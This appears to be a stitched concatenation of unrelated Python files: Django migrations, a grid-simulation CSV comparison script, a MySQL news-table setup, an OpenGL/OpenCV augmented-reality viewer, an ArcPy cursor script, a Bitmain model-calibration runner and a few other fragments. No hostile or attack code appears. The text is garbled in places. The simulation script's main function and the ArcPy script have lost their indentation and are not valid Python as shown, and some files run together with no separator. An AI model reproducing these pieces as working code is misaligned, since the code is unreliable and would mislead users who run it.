        zipped = zip(languages, similarities)
        sorted_probabilities = sorted(zipped, key=lambda t: t[1])
        if len(sorted_probabilities) > 2:
            sorted_probabilities = sorted_probabilities[-3:]
        sorted_probabilities.reverse()
        for language, probability in sorted_probabilities:
            print(name, " is ", language, " language with probability: ", round(probability*100, 2))
if __name__ == "__main__":
    # Collect every non-hidden file from languages/ plus the mystery text.
    DATA_FILES = ["languages/" + entry
                  for entry in os.listdir('languages/')
                  if entry[0] != '.']
    DATA_FILES.append("osoncje.txt")
    KMC = KMedoidsClustering(read_file(DATA_FILES))
    KMC.run()
|
# Generated by Django 3.2.5 on 2021-08-01 07:52
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make Profile.profile_image optional and upload to media/profiles."""

    dependencies = [
        ('profiles', '0002_remove_profile_discount'),
    ]

    operations = [
        migrations.AlterField(
            model_name='profile',
            name='profile_image',
            field=models.ImageField(blank=True, upload_to='media/profiles'),
        ),
    ]
|
#!/usr/bin/env python3
"""
Created on March 28, 2023
@author: Gary Black
"""
import argparse
import csv

# absolute values less than this are considered zero due to limits on
# computational precision
NearZero = 1e-12
# print a warning flag for difference values greater than this
FlagPerDiff = 2.0
FlagAbsDiff = 0.1


def checkDiff(value1, value2, message, absFlag=True, printFlag=False):
    """Compare two values; print any difference and return True when equal.

    Equal values, or values both within NearZero of zero, count as equal.
    Otherwise the absolute and percent differences are computed and a
    flagged line (prefixed '***') is printed when they exceed the
    FlagAbsDiff/FlagPerDiff thresholds (absFlag=False checks only the
    percent threshold).  printFlag=True also prints non-flagged results.
    """
    value1 = float(value1)
    value2 = float(value2)
    equalFlag = True
    if value1 == value2:
        if printFlag:
            print(message + ' values are equal', flush=True)
    elif abs(value1) < NearZero and abs(value2) < NearZero:
        if printFlag:
            print(message + ' values are both within computational precision of zero and considered equal', flush=True)
    else:
        equalFlag = False
        absdiff = abs(value1 - value2)
        mean = (value1 + value2) / 2
        # BUG FIX: the percent difference previously divided by the mean
        # unconditionally, raising ZeroDivisionError whenever
        # value1 == -value2.  Treat a zero mean as an infinite percent diff.
        perdiff = abs(100 * absdiff / mean) if mean != 0.0 else float('inf')
        if not absFlag and perdiff > FlagPerDiff:
            print('*** ' + message + ' values % diff: ' + str(round(perdiff, 4)), flush=True)
        elif perdiff > FlagPerDiff and absdiff > FlagAbsDiff:
            print('*** ' + message + ' values abs diff: ' + str(round(absdiff, 4)) + ', % diff: ' + str(round(perdiff, 4)), flush=True)
        elif printFlag:
            print(message + ' values abs diff: ' + str(round(absdiff, 4)) + ', % diff: ' + str(round(perdiff, 4)), flush=True)
    return equalFlag
def checkEqual(value1, value2, message):
    """Return True when the values match; otherwise print both and return False."""
    if value1 == value2:
        return True
    print(message + ', sim 1: ' + str(value1) + ', sim 2: ' + str(value2), flush=True)
    return False
def checkSizes(matName, startIndex, row1, row2):
    """Compare a matrix's width/height/entry-count fields between two rows.

    Prints a message for every mismatched field; returns True when all
    three fields match.
    """
    equalFlag = True
    for offset, label in enumerate(('width', 'height', 'number of entries')):
        field1 = row1[startIndex + offset]
        field2 = row2[startIndex + offset]
        if field1 != field2:
            equalFlag = False
            print(matName + ' matrix ' + label + ' mismatch, sim 1: ' + str(field1) + ', sim 2: ' + str(field2), flush=True)
    return equalFlag
def checkStats(matName, startIndex, row1, row2):
    """Report min/max/mean differences for a matrix's summary columns."""
    for offset, stat in enumerate(('min', 'max', 'mean')):
        checkDiff(row1[startIndex + offset], row2[startIndex + offset],
                  matName + ' matrix ' + stat)
def _main():
parser = argparse.ArgumentParser()
parser.add_argument("sim_dir1", help="Simulation Directory 1")
parser.add_argument("sim_dir2", help="Simulation Directory 2")
opts = parser.parse_args()
simDir1 = opts.sim_dir1 + '/test_suite/'
simDir2 = opts.sim_dir2 + '/test_suite/'
print('Begin INITALIZATION accuracy comparison:', flush=True)
fp1 = open(simDir1 + 'init_accy.csv', 'r')
fp2 = open(simDir2 + 'init_accy.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
initHeader1 = next(reader1)
initHeader2 = next(reader2)
if initHeader1 != initHeader2:
print('Mismatched init_accy.csv headers being compared--exiting!\n', flush=True)
exit()
initRow1 = next(reader1)
initRow2 = next(reader2)
# init_accy.csv entries: nodeqty,xqty,zqty,Jacobian_elements,Yphys_scaled_terms,F_width,F_height,F_entries,F_min,F_max,F_mean,eyex_width,eyex_height,eyex_entries,eyex_min,eyex_max,eyex_mean,R_width,R_height,R_entries,R_min,R_max,R_mean
# compare nodeqty, xqty, zqty to make sure it's the same model being compared
# across simulations
matchFlag = checkEqual(initRow1[0], initRow2[0], 'Different model number of nodes')
matchFlag = matchFlag and checkEqual(initRow1[1], initRow2[1], 'Different model X dimension')
matchFlag = matchFlag and checkEqual(initRow1[2], initRow2[2], 'Different model Z dimension')
if not matchFlag:
print('Mismatched models being compared--exiting!\n', flush=True)
exit()
checkEqual(initRow1[3], initRow2[3], 'Different number of Jacobian elements')
checkEqual(initRow1[4], initRow2[4], 'Different number of Yphys scaled terms')
checkSizes('F', 5, initRow1, initRow2)
checkStats('F', 8, initRow1, initRow2)
checkSizes('eyex', 11, initRow1, initRow2)
checkStats('eyex', 14, initRow1, initRow2)
checkSizes('R', 17, initRow1, initRow2)
checkStats('R', 20, initRow1, initRow2)
# tests of checkDiff
#checkDiff(10.0, 8.0, 'Test')
#checkDiff(1e-13, 1e-16, 'Zero')
#checkDiff(1e-8, 1e-16, 'Low')
fp1.close()
fp2.close()
print('End INITALIZATION accuracy comparison\n', flush=True)
print('Begin ESTIMATE accuracy comparison:', flush=True)
fp1 = open(simDir1 + 'est_accy.csv', 'r')
fp2 = open(simDir2 + 'est_accy.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_accy.csv headers being compared--exiting!\n', flush=True)
exit()
# to get index numbers
#ctr = 0
#for item in estHeader1:
# print (str(ctr) + ': ' + item, flush=True)
# ctr += 1
itCount = 0
sumPerErr1 = 0.0
sumPerErr2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
checkSizes('P', 1, estRow1, estRow2)
checkStats('P', 4, estRow1, estRow2)
checkSizes('P1', 7, estRow1, estRow2)
checkStats('P1', 10, estRow1, estRow2)
checkSizes('P2', 13, estRow1, estRow2)
checkStats('P2', 16, estRow1, estRow2)
checkSizes('P3', 19, estRow1, estRow2)
checkStats('P3', 22, estRow1, estRow2)
checkSizes('Q', 25, estRow1, estRow2)
checkStats('Q', 28, estRow1, estRow2)
checkSizes('Ppre', 31, estRow1, estRow2)
checkStats('Ppre', 34, estRow1, estRow2)
checkSizes('x', 37, estRow1, estRow2)
checkStats('x', 40, estRow1, estRow2)
checkSizes('xpre', 43, estRow1, estRow2)
checkStats('xpre', 46, estRow1, estRow2)
checkSizes('J', 49, estRow1, estRow2)
checkStats('J', 52, estRow1, estRow2)
checkSizes('S1', 55, estRow1, estRow2)
checkStats('S1', 58, estRow1, estRow2)
checkSizes('S2', 61, estRow1, estRow2)
checkStats('S2', 64, estRow1, estRow2)
checkSizes('S3', 67, estRow1, estRow2)
checkStats('S3', 70, estRow1, estRow2)
checkStats('R', 73, estRow1, estRow2)
checkSizes('Supd', 76, estRow1, estRow2)
checkStats('Supd', 79, estRow1, estRow2)
checkDiff(estRow1[82], estRow2[82], 'Supd matrix condition number estimate')
checkSizes('K3', 83, estRow1, estRow2)
checkStats('K3', 86, estRow1, estRow2)
checkSizes('K2', 89, estRow1, estRow2)
checkStats('K2', 92, estRow1, estRow2)
checkSizes('Kupd', 95, estRow1, estRow2)
checkStats('Kupd', 98, estRow1, estRow2)
#print('Kupd min 1: ' + str(estRow1[98]), flush=True)
#print('Kupd min 2: ' + str(estRow2[98]), flush=True)
#print('Kupd max 1: ' + str(estRow1[99]), flush=True)
#print('Kupd max 2: ' + str(estRow2[99]), flush=True)
#print('Kupd mean 1: ' + str(estRow1[100]), flush=True)
#print('Kupd mean 2: ' + str(estRow2[100]), flush=True)
checkSizes('z', 101, estRow1, estRow2)
checkStats('z', 104, estRow1, estRow2)
checkSizes('h', 107, estRow1, estRow2)
checkStats('h', 110, estRow1, estRow2)
checkSizes('yupd', 113, estRow1, estRow2)
checkStats('yupd', 116, estRow1, estRow2)
checkSizes('x1', 119, estRow1, estRow2)
checkStats('x1', 122, estRow1, estRow2)
checkSizes('xupd', 125, estRow1, estRow2)
checkStats('xupd', 128, estRow1, estRow2)
checkSizes('P4', 131, estRow1, estRow2)
checkStats('P4', 134, estRow1, estRow2)
checkSizes('P5', 137, estRow1, estRow2)
checkStats('P5', 140, estRow1, estRow2)
checkSizes('Pupd', 143, estRow1, estRow2)
checkStats('Pupd', 146, estRow1, estRow2)
checkDiff(estRow1[149], estRow2[149], 'Measurement vmag min')
checkDiff(estRow1[150], estRow2[150], 'Measurement vmag max')
checkDiff(estRow1[151], estRow2[151], 'Measurement vmag mean')
checkDiff(estRow1[152], estRow2[152], 'Estimate vmag min')
checkDiff(estRow1[153], estRow2[153], 'Estimate vmag max')
checkDiff(estRow1[154], estRow2[154], 'Estimate vmag mean')
checkDiff(estRow1[155], estRow2[155], 'Estimate vmag percent error')
print('Estimate vmag percent error for timestamp sim1: ' + str(round(float(estRow1[155]), 4)) + ', sim2: ' + str(round(float(estRow2[155]), 4)), flush=True)
sumPerErr1 += float(estRow1[155])
sumPerErr2 += float(estRow2[155])
# break after first timestamp for debugging
#if itCount == 1:
# break
except:
break
fp1.close()
fp2.close()
meanPerErr1 = sumPerErr1/itCount
meanPerErr2 = sumPerErr2/itCount
print('\nMean estimate vmag percent error over all timestamps sim1: ' + str(round(meanPerErr1, 4)) + ', sim2: ' + str(round(meanPerErr2, 4)), flush=True)
print('End ESTIMATE accuracy comparison\n', flush=True)
print('Begin ESTIMATE performance comparison:', flush=True)
fp1 = open(simDir1 + 'est_perf.csv', 'r')
fp2 = open(simDir2 + 'est_perf.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_perf.csv headers being compared--exiting!\n', flush=True)
exit()
itCount = 0
sumEstTime1 = 0.0
sumEstTime2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
checkDiff(estRow1[1], estRow2[1], 'Supd inverse time')
checkDiff(estRow1[2], estRow2[2], 'Supd inverse virtual memory')
checkDiff(estRow1[3], estRow2[3], 'Kupd multiply time')
checkDiff(estRow1[4], estRow2[4], 'Kupd multiply virtual memory')
checkDiff(estRow1[5], estRow2[5], 'Total estimate time')
checkDiff(estRow1[6], estRow2[6], 'Total estimate virtual memory')
sumEstTime1 += float(estRow1[5])
sumEstTime2 += float(estRow2[5])
except:
break
fp1.close()
fp2.close()
meanEstTime1 = sumEstTime1/itCount
meanEstTime2 = sumEstTime2/itCount
print('\nMean total estimate time sim1: ' + str(round(meanEstTime1, 4)) + ', sim2: ' + str(round(meanEstTime2, 4)), flush=True)
checkDiff(meanEstTime1, meanEstTime2, 'Mean total estimate time', False, True)
print('End ESTIMATE performance comparison\n', flush=True)
print('Begin ESTIMATE vs. measurement for ' + opts.sim_dir1 + ':', flush=True)
fpM = open(simDir1 + 'meas_vmagpu.csv', 'r')
fpE = open(simDir1 + 'est_vmagpu.csv', 'r')
readerM = csv.reader(fpM)
readerE = csv.reader(fpE)
headerM = next(readerM)
headerE = next(readerE)
if headerM != headerE:
print('Mismatched meas_vmagpu.csv and est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(headerM)-1
itCount = 0
sumCount = 0
sumMeasVMag = 0.0
sumEstVMag = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
rowM = next(readerM)
rowE = next(readerE)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + rowM[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(rowM[inode], rowE[inode],
headerM[inode] + ' estimate vs. measurement')
sumMeasVMag += float(rowM[inode])
sumEstVMag += float(rowE[inode])
sumCount += numNodes
except:
break
fpM.close()
fpE.close()
meanMeasVMag = sumMeasVMag/sumCount
meanEstVMag = sumEstVMag/sumCount
print('\nMean measurement vmag: ' + str(round(meanMeasVMag, 4)) + ', estimate vmag: ' + str(round(meanEstVMag, 4)), flush=True)
checkDiff(meanMeasVMag, meanEstVMag, 'Mean measurement vs. estimate vmag over all nodes and timestamps', False, True)
print('End ESTIMATE vs. measurement for ' + opts.sim_dir1 + '\n', flush=True)
print('Begin ESTIMATE vs. measurement for ' + opts.sim_dir2 + ':', flush=True)
fpM = open(simDir2 + 'meas_vmagpu.csv', 'r')
fpE = open(simDir2 + 'est_vmagpu.csv', 'r')
readerM = csv.reader(fpM)
readerE = csv.reader(fpE)
headerM = next(readerM)
headerE = next(readerE)
if headerM != headerE:
print('Mismatched meas_vmagpu.csv and est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(headerM)-1
itCount = 0
sumCount = 0
sumMeasVMag = 0.0
sumEstVMag = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
rowM = next(readerM)
rowE = next(readerE)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + rowM[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(rowM[inode], rowE[inode],
headerM[inode] + ' estimate vs. measurement')
sumMeasVMag += float(rowM[inode])
sumEstVMag += float(rowE[inode])
sumCount += numNodes
except:
break
fpM.close()
fpE.close()
meanMeasVMag = sumMeasVMag/sumCount
meanEstVMag = sumEstVMag/sumCount
print('\nMean measurement vmag: ' + str(round(meanMeasVMag, 4)) + ', estimate vmag: ' + str(round(meanEstVMag, 4)), flush=True)
checkDiff(meanMeasVMag, meanEstVMag, 'Mean measurement vs. estimate vmag over all nodes and timestamps', False, True)
print('End ESTIMATE vs. measurement for ' + opts.sim_dir2 + '\n', flush=True)
print('Begin ESTIMATE voltage magnitude comparison:', flush=True)
fp1 = open(simDir1 + 'est_vmagpu.csv', 'r')
fp2 = open(simDir2 + 'est_vmagpu.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(estHeader1)-1
itCount = 0
sumCount = 0
sumEstVMag1 = 0.0
sumEstVMag2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(estRow1[inode], estRow2[inode],
estHeader1[inode] + ' estimate')
sumEstVMag1 += float(estRow1[inode])
sumEstVMag2 += float(estRow2[inode])
sumCount += numNodes
except:
break
fp1.close()
fp2.close()
meanEstVMag1 = sumEstVMag1/sumCount
meanEstVMag2 = sumEstVMag2/sumCount
print('\nMean estimate vmag sim1: ' + str(round(meanEstVMag1, 4)) + ', sim2: ' + str(round(meanEstVMag2, 4)), flush=True)
checkDiff(meanEstVMag1, meanEstVMag2, 'Mean estimate vmag', False, True)
print('End ESTIMATE voltage magnitude comparison\n', flush=True)
# Entry point: run the full simulation accuracy/performance comparison above.
if __name__ == "__main__":
    _main()
|
import mysql.connector
import sys
class createdb_table:
    """Create the Hindunews MySQL database and its news table if missing.

    Usage: instantiate, then call create_require_db_tables(); the MySQL
    credentials are read from sys.argv[1] (user) and sys.argv[2] (password).
    """

    def __init__(self):
        # Bug fix: the original misspelled this initializer as `__int__`,
        # so construction never initialized the attributes.
        self.database = "Hindunews"
        self.username = ''
        self.password = ''
        self.db_list = []
        self.connection = ''
        self.cursor = ''

    # Backward-compatible alias: existing callers invoke the misspelled
    # initializer explicitly (object_.__int__()).
    __int__ = __init__

    def user_input(self):
        """Read MySQL credentials from the command line: <user> <password>."""
        self.username = sys.argv[1]
        self.password = sys.argv[2]

    def set_up_db_connection(self):
        """Open a connection to the local MySQL server and create a cursor."""
        self.connection = mysql.connector.connect(
            host="localhost", user=self.username, passwd=self.password)
        self.cursor = self.connection.cursor()

    def create_require_db_tables(self):
        """Create the database and the National_news_details table if absent."""
        self.user_input()
        self.set_up_db_connection()
        self.cursor.execute("show databases;")
        for db in self.cursor:
            name = db[0]
            # Bug fix: the original called db[0].encode(), producing bytes that
            # could never equal the str self.database, so the "already exists"
            # branch was unreachable. Normalize to str instead.
            if isinstance(name, bytes):
                name = name.decode()
            self.db_list.append(name)
        create_tables = ["create table National_news_details (sk_key varchar(500) primary key, News_headlines varchar(1000), News_intro varchar(2000), News_details varchar(50000), Country varchar(100),Date varchar(100),Updated_at varchar(200), News_url varchar(1000));"]
        if self.database not in self.db_list:
            self.cursor.execute("create database %s;" % self.database)
            print("\n %s db created" % self.database)
            self.cursor.execute("use %s;" % self.database)
            for query in create_tables:
                self.cursor.execute(query)
            print("\n")
            print("Table created.................")
        else:
            print("%s db is already exist" % self.database)
            self.cursor.execute("use %s;" % self.database)
            self.cursor.execute("show tables;")
            table_cursor = self.cursor.fetchall()
            if not table_cursor:
                for query in create_tables:
                    self.cursor.execute(query)
                print("table created.......")
            else:
                print("\n")
                print("Table is already exist in DB", table_cursor)
        self.connection.close()
# Build the helper and run the one-shot schema setup.
object_ = createdb_table()
# NOTE(review): the class misspells __init__ as __int__, so construction does
# not initialize attributes automatically; this explicit call works around it.
object_.__int__()
object_.create_require_db_tables()
|
# Generated by Django 3.0.2 on 2020-01-31 07:08
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: renames Question.voter to Question.voter1."""

    dependencies = [
        ('polls', '0016_auto_20200131_1226'),
    ]

    operations = [
        migrations.RenameField(
            model_name='question',
            old_name='voter',
            new_name='voter1',
        ),
    ]
|
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import cv2
import sys
from PIL import Image
import numpy as np
from webcam import Webcam
from glyphs.constants import *
from objloader import *
# Backend switch: True selects the keras-based icon detector, False selects
# the glyph detector (only the chosen backend's module is imported).
us = True
if us is not True:
    from glyphs.glyphs import Glyphs
else:
    from detect_and_track import *
class AR:
    """Augmented-reality viewer.

    Draws the live webcam feed as an OpenGL background quad and renders a 3D
    model (teapot / pikachu / skull) on top of each detected marker, using the
    detector selected by the module-level `us` flag.
    """

    # constants
    # Elementwise sign-flip pattern used in buildViewMatrix() to convert the
    # OpenCV camera pose to OpenGL's axis convention (applied with `*`, i.e.
    # elementwise, not a matrix product).
    INVERSE_MATRIX = np.array([[ 1.0, 1.0, 1.0, 1.0],
                               [-1.0,-1.0,-1.0,-1.0],
                               [-1.0,-1.0,-1.0,-1.0],
                               [ 1.0, 1.0, 1.0, 1.0]])

    def __init__(self):
        # initialise webcam and start thread
        self.webcam = Webcam()
        self.webcam.start()

        # initialise detector (glyph-based or keras icon detector)
        if us is not True:
            self.glyphs = Glyphs()
        else:
            self.detector = Detector( model_path="new_icon_detector_model/keras_model.h5",
                                      camera_matrix_path="camera_parameters.json")

        # initialise shapes (the .obj models are loaded later in initGL, once
        # a GL context exists)
        self.cone = None
        self.sphere = None
        self.isShapeSwitch = False;

        # initialise texture
        self.texture_background = None

        # initialise view matrix
        self.view_matrix = np.array([])

        # refine arg: hand-tuned per-label translation offsets applied to tvec
        self.deltaX = 0.5
        self.deltaY = 0.3
        self.deltaZ = 0.0

    def initGL(self, Width, Height):
        """One-time OpenGL state setup; must run after the GLUT window exists."""
        glClearColor(0.0, 0.0, 0.0, 0.0)
        glClearDepth(1.0)
        glDepthFunc(GL_LESS)
        glEnable(GL_DEPTH_TEST)
        glShadeModel(GL_SMOOTH)
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        # fixed perspective: ~33.7 degree fov, 1.3 aspect ratio
        gluPerspective(33.7, 1.3, 0.1, 100.0)
        glMatrixMode(GL_MODELVIEW)

        # assign shapes
        # self.cone = OBJ('resources/basic_object/cone.obj')
        # self.sphere = OBJ('resources/basic_object/sphere.obj')
        self.pikachu = OBJ('resources/Pikachu_B/Pikachu_B.obj')
        self.skull = OBJ('resources/Skull/12140_Skull_v3_L2.obj')

        # assign texture handles (one for the camera background, one shared
        # slot for model textures)
        glEnable(GL_TEXTURE_2D)
        self.texture_background = glGenTextures(1)
        self.texture_object = glGenTextures(1)

    def buildViewMatrix(self, label, rvec, tvec):
        """Build self.view_matrix (column-major, for glLoadMatrixf) from an
        OpenCV pose (rvec, tvec), applying a per-label translation offset."""
        # build view matrix: rotation vector -> 3x3 rotation matrix
        rmtx = cv2.Rodrigues(rvec)[0]

        if label == 2: # skull
            self.deltaX = 0.1 + 0.315
            self.deltaY = 0.2 + 0.3
            tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
        elif label == 1: #pikachu
            self.deltaX = 0.3
            self.deltaY = 0.3
            self.deltaZ = 1.1
            tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
        else:
            self.deltaX = 0.4
            self.deltaY = 0.3
            tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
            pass

        # TODO
        self.view_matrix = np.array( [[rmtx[0][0], rmtx[0][1], rmtx[0][2], tvec[0]],
                                      [rmtx[1][0], rmtx[1][1], rmtx[1][2], tvec[1]],
                                      [rmtx[2][0], rmtx[2][1], rmtx[2][2], tvec[2]],
                                      [0.0       , 0.0       , 0.0       , 1.0   ]])

        # Elementwise multiply flips axes to OpenGL's convention; the transpose
        # then yields the column-major layout glLoadMatrixf expects.
        self.view_matrix = self.view_matrix * self.INVERSE_MATRIX
        self.view_matrix = np.transpose(self.view_matrix)

    def drawScene(self):
        """GLUT display/idle callback: draw the webcam background, then the
        detected models, then swap buffers."""
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glLoadIdentity()

        # get image from webcam
        image = self.webcam.get_current_frame()

        # convert image to OpenGL texture format (flip both axes, raw bytes)
        bg_image = cv2.flip(image, 0)
        bg_image = cv2.flip(bg_image, 1)
        bg_image = Image.fromarray(bg_image)
        ix = bg_image.size[0]
        iy = bg_image.size[1]
        bg_image = bg_image.tobytes("raw", "BGRX", 0, -1)

        # create background texture
        glBindTexture(GL_TEXTURE_2D, self.texture_background)
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
        # NOTE(review): pixels are packed as BGRX but uploaded as GL_RGBA --
        # red/blue channels may be swapped; confirm this is intended.
        glTexImage2D(GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, bg_image)

        # draw background quad far behind the models
        glBindTexture(GL_TEXTURE_2D, self.texture_background)
        glPushMatrix()
        glTranslatef(0.0,0.0,-10.0)
        self.drawBackground()
        glPopMatrix()

        # handle glyphs / detections for this frame
        self.handleImage(image)

        glutSwapBuffers()

    def init_object_texture(self,image_filepath):
        """Load an image file into the shared model texture slot."""
        # THE COMMENTS FOR THE FOLLOWING STEPS ARE SAME AS IN THE ABOVE
        # FUNCTION, THE ONLY DIFFERENCE IS, HERE INSTEAD OF USING CAMERA FRAME
        # WE USE IMAGE FILES
        tex = cv2.imread(image_filepath)
        tex = cv2.flip(tex, 0)
        tex = Image.fromarray(tex)
        ix = tex.size[0]
        iy = tex.size[1]
        tex = tex.tobytes("raw","BGRX", 0, -1)

        # if self.texture_object is None:
        #     self.texture_object = glGenTextures(1)
        glActiveTexture(GL_TEXTURE0)
        glBindTexture(GL_TEXTURE_2D, self.texture_object)
        glEnable(GL_TEXTURE_2D)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
        glTexImage2D(GL_TEXTURE_2D, 0,GL_RGBA, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, tex)
        return None

    def render3Dobj(self, label):
        """Draw the model for a detection label:
        0 = textured teapot, 1 = pikachu, 2 = skull; anything else is ignored."""
        if label == 0:
            self.init_object_texture("resources/basic_object/wave-textures.png")
            glRotate(180, 0, 1, 0)
            glutSolidTeapot(0.3) #HARCODE
        elif label == 1:
            glRotate(210, 0, 1, 0)
            glRotate(90, 1, 0, 0)
            glCallList(self.pikachu.gl_list)
            glTranslatef(0.5, 0.0, 0.0)
        elif label == 2:
            glScalef(0.02, 0.02, 0.02)
            glRotate(90, 0, 0, 1)
            glRotate(90, 1, 0, 0)
            glRotate(90, 0, 1, 0)
            glCallList(self.skull.gl_list)
        else:
            pass

    def handleImage(self, image):
        """Run the detector on the frame and render one model per detection."""
        # attempt to detect glyphs
        results = []
        # NOTE(review): `if True` stands in for the commented-out try/except
        # below, so detector errors currently propagate.
        if True:
            if us is not True:
                # results = self.glyphs.detect(image) #TODO create detector
                results = self.glyphs.detect(cv2.flip(image, 1)) #TODO create detector
            else:
                results = self.detector.main_detect(image)
        # except Exception as ex:
        #     print("Exception !: ")
        #     print(ex)

        if not results:
            return

        for ret in results:
            # each detection is a pose (rvec, tvec) plus a model label
            rvec, tvec, label = ret
            # print(tvec)

            # build view matrix
            self.buildViewMatrix(label, rvec, tvec)

            # load view matrix and draw shape
            glPushMatrix()
            glLoadMatrixf(self.view_matrix)
            self.render3Dobj(label) #TODO
            glPopMatrix()

    def drawBackground(self):
        """Draw the full-view textured quad that carries the camera image."""
        glBegin(GL_QUADS)
        glTexCoord2f(0.0, 1.0); glVertex3f(-4.0, -3.0, 0.0)
        glTexCoord2f(1.0, 1.0); glVertex3f( 4.0, -3.0, 0.0)
        glTexCoord2f(1.0, 0.0); glVertex3f( 4.0,  3.0, 0.0)
        glTexCoord2f(0.0, 0.0); glVertex3f(-4.0,  3.0, 0.0)
        glEnd()

    def main(self):
        """Create the GLUT window and enter the render loop (never returns)."""
        # setup and run OpenGL
        glutInit()
        glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
        glutInitWindowSize(640, 480)
        glutInitWindowPosition(800, 400)
        self.window_id = glutCreateWindow("OpenGL Window")
        glutDisplayFunc(self.drawScene)
        glutIdleFunc(self.drawScene)
        self.initGL(640, 480)
        glutMainLoop()
# Script entry: construct the AR app and start the GLUT main loop (blocks).
ar = AR()
ar.main()
# Generated by Django 2.2.11 on 2020-07-20 05:29
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the optional Visitor.message text field."""

    dependencies = [
        ('accounts', '0006_auto_20200719_1222'),
    ]

    operations = [
        migrations.AddField(
            model_name='visitor',
            name='message',
            field=models.TextField(blank=True, max_length=5000, null=True),
        ),
    ]
|
#-------------------------------------------------------------------------------
# Name: Cursor01.py
# Purpose:
#
# Author: Matthew Rowland
#
# Created: 05-02-2019
# Copyright: (c) Rowland 2019
#-------------------------------------------------------------------------------
import os
import sys
import timeit
if len(sys.argv) != 4:
print "Usage: Cursor01.py <FeatureClass>"
sys.exit()
fc = sys.argv[1]
import arcpy
if not arcpy.Exists(fc):
sys.exit()
scriptFolder = os.path.dirname(os.path.abspath(__file__))
os.chdir(scriptFolder)
start=timeit.default_timer()
def getCityProvince():
rows = arcpy.SearchCursor(fc,"","", "NAME; PROV", "PROV D")
count = 0
currentState = ""
print "Name, Prov"
for row in rows:
if currentState != row.PROV:
currentState = row.PROV
count += 1
print u"{},{}".format(row.NAME, row.PROV)
print "There are {} cities in the above list".format(count)
del rows
del row
getCityProvince()

# Report total wall-clock runtime of the cursor pass.
stop=timeit.default_timer()
seconds=stop-start
print "Seconds to execute:",seconds
|
#!/usr/bin/env python
##
## Copyright (C) Bitmain Technologies Inc.
## All Rights Reserved.
##
import argparse
import caffe
import os
import sys
import time
sys.path.append('../../calibration_tool/lib')
from Calibration import Calibration
#caffe.set_mode_gpu()
#caffe.set_device(0)
def run_calibration(args):
    """Run int8 calibration for the named model.

    Builds the calibration settings (paths are derived from args.model_name),
    runs the quantization flow, and exports the int8 caffemodel plus its
    calibration table into the model's directory.
    """
    model = args.model_name
    # Key order matters only for the diagnostic print below; values mirror the
    # command-line options plus fixed tool defaults.
    settings = {
        "model_name": model,
        "in_prototxt": './{}/deploy.prototxt'.format(model),
        "in_caffemodel": './{}/{}.caffemodel'.format(model, model),
        "iteration": 20,
        "enable_memory_opt": args.memory_opt,
        "enable_calibration_opt": 1,
        "histogram_bin_num": 2048,
        "math_lib_path": '../../calibration_tool/lib/calibration_math.so'
    }
    print(settings)

    calibrator = Calibration(settings)
    calibrator.calc_tables()
    calibrator.export_model('./{}/bmnet_{}_int8.caffemodel'.format(model, model))
    calibrator.export_calirabtion_pb2('./{}/bmnet_{}_calibration_table'.format(model, model))
if __name__ == '__main__':
    # model name is positional; --memory_opt toggles the memory optimization
    parser = argparse.ArgumentParser()
    parser.add_argument('model_name', metavar='model-name', help='model name')
    parser.add_argument('--memory_opt', action='store_true', help='Enable memory optimization.')
    args = parser.parse_args()

    # time the whole calibration run
    time_start = time.time()
    run_calibration(args)
    time_end = time.time()
    print('Time: %fs' % (time_end - time_start))
    sys.exit(0)
|
from Game.PPlay.window import *
from Game.game import *
from Game.main_menu import *
from Game.gameover import *
from Game.PPlay.sound import *
# level[0] is a shared, mutable screen-state flag:
# 0 = main menu, 1 = gameplay, 2 = game over.
level = [0]

